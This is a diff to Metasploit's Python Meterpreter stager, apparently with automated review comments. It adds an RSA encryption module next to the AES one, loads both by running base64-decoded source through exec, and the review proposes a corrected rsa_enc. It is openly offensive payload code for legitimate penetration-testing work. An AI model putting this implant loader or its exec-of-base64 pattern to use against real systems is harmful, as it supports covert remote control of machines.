diff --git a/lib/msf/core/payload/python/meterpreter_loader.rb b/lib/msf/core/payload/python/meterpreter_loader.rb index 80524e9058..cba4aa1fdc 100644 --- a/lib/msf/core/payload/python/meterpreter_loader.rb +++ b/lib/msf/core/payload/python/meterpreter_loader.rb @@ -145,13 +145,19 @@ module Payload::Python::MeterpreterLoader end def python_encryptor_loader - encryptor = Rex::Text.encode_base64(python_encryptor_source) + aes_encryptor = Rex::Text.encode_base64(python_aes_source) + rsa_encryptor = Rex::Text.encode_base64(python_rsa_source) %Q? import codecs,imp,base64 met_aes = imp.new_module('met_aes') -exec(compile(base64.b64decode(codecs.getencoder('utf-8')('#{encryptor}')[0]),'','exec'), met_aes.__dict__) +met_rsa = imp.new_module('met_rsa') +exec(compile(base64.b64decode(codecs.getencoder('utf-8')('#{aes_encryptor}')[0]),'','exec'), met_aes.__dict__) +exec(compile(base64.b64decode(codecs.getencoder('utf-8')('#{rsa_encryptor}')[0]),'','exec'), met_rsa.__dict__) sys.modules['met_aes'] = met_aes -import met_aes +sys.modules['met_rsa'] = met_rsa +import met_rsa, met_aes +def met_rsa_encrypt(der, msg): + return met_rsa.rsa_enc(der, msg) def met_aes_encrypt(key, iv, pt): return met_aes.AESCBC(key).encrypt(iv, pt) def met_aes_decrypt(key, iv, pt): 
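Review bot: The new `met_rsa_encrypt(der, msg)` wrapper is the entry point the rest of the stager will call, yet it says nothing about what `der` and `msg` are, and nothing here constrains them; from the sibling hunk it hands `der` straight to `met_rsa.rsa_enc`, which parses it as a DER-encoded SubjectPublicKeyInfo and pads `msg` into a fixed 256-byte PKCS#1 block. A short docstring would spare the caller reading `python_rsa_source`: `"""RSA-encrypt msg (bytes) under the DER SubjectPublicKeyInfo in der; msg must fit the key's PKCS#1 v1.5 block."""`. The enclosing Ruby method `python_encryptor_loader` closes outside this hunk.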
@@ -159,7 +165,68 @@ def met_aes_decrypt(key, iv, pt): ? end - def python_encryptor_source + def python_rsa_source + %Q? +import struct as s, base64 as b, sys, math, random, binascii, os +is2 = sys.version_info[0] < 3 +def bt(b): + if is2: + return b + return ord(b) +def b2i(b): + if is2: + return int(b.encode('hex'), 16) + return int.from_bytes(b, byteorder='big') +def i2b(i): + h='{0:x}'.format(i) + if len(h)%2==1: + h = '0'+h + return binascii.unhexlify(h) +def rs(a, o): + if a[o] == bt(b'\\x81'): + return (s.unpack('B', a[o+1])[0], 2 + o) + elif a[o] == bt(b'\\x82'): + return (s.unpack('>H', a[o+1:o+3])[0], 3 + o) +def ri(b, o): + i, o = rs(b, o) + return (b[o:o+i], o+i) +def b2me(b): + if b[0] != bt(b'\\x30'): + return (None, None) + _, o = rs(b, 1) + if b[o] != bt(b'\\x02'): + return (None, None) + (m, o) = ri(b, o + 1) + if b[o] != bt(b'\\x02'): + return (None, None) + e = b[o+2:] + return (b2i(m), b2i(e)) +def der2me(d): + if d[0] != bt(b'\\x30'): + return (None, None) + _, o = rs(d, 1) + while o < len(d): + if d[o] == bt(b'\\x30'): + o += s.unpack('B', d[o+1:o+2])[0] + elif d[o] == bt(b'\\x05'): + o += 2 + elif d[o] == bt(b'\\x03'): + _, o = rs(d, o + 1) + return b2me(d[o + 1:]) + else: + return (None, None) +def rsa_enc(der, msg): + m, e = der2me(der) + h=b'\\x00\\x02' + d=b'\\00' + #p=os.urandom(256-len(h)-len(msg)-len(d)) + l=256-len(h)-len(msg)-len(d) + p=os.urandom(512).replace(b'\\x00',b'') + return i2b(pow(b2i(h+p[:l]+d+msg), e, m)) +? + end + + def python_aes_source %Q? import copy,struct,sys def chunks(lst, n): @@ -282,7 +349,7 @@ class AESCBC(object): raise ValueError('ciphertext block must be 16 bytes') cb=_s2b(ct);pt=[(p^l)for(p,l)in zip(self.dec_in(cb),self._lcb)];self._lcb=cb return _b2s(pt) - ? +? end end
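Review bot: `rsa_enc` hard-codes a 256-byte (2048-bit) modulus and never validates the padding length: `l=256-len(h)-len(msg)-len(d)` goes negative once `msg` exceeds 253 bytes and `p[:l]` then silently mis-pads instead of failing, nothing enforces the minimum of 8 random bytes PKCS#1 v1.5 requires, and `i2b` returns a minimal-length encoding, so a ciphertext with a leading zero byte comes out shorter than the modulus — whether the receiving side tolerates that is not visible here. The `\\x81` branch of `rs` is a latent Python 3 error, because indexing `bytes` yields an `int` and `s.unpack('B', ...)` needs a buffer; `s.unpack('B', a[o+1:o+2])[0]` works on both versions, as the `\\x82` branch already does. The SEQUENCE branch of `der2me` advances by the content length only, not past the 2-byte tag/length header, so it lands two bytes early on the `05 00` NULL that the next branch then skips; that happens to work for rsaEncryption keys, but `o += 2 + s.unpack('B', d[o+1:o+2])[0]` is the intended skip. The commented-out `#p=os.urandom(...)` line is dead code and should go. The rewrite below derives the block size from the modulus, rejects oversized messages and zero-pads the output to the key length (backslashes doubled as in the surrounding `%Q?` literal).
```python
def rsa_enc(der, msg):
  m, e = der2me(der)
  if m is None:
    raise ValueError('unsupported public key')
  k = (m.bit_length() + 7) // 8
  l = k - len(msg) - 3
  if l < 8:
    raise ValueError('message too long for key')
  p = b''
  while len(p) < l:
    p += os.urandom(l - len(p) + 8).replace(b'\\x00', b'')
  c = i2b(pow(b2i(b'\\x00\\x02' + p[:l] + b'\\x00' + msg), e, m))
  return b'\\x00' * (k - len(c)) + c
```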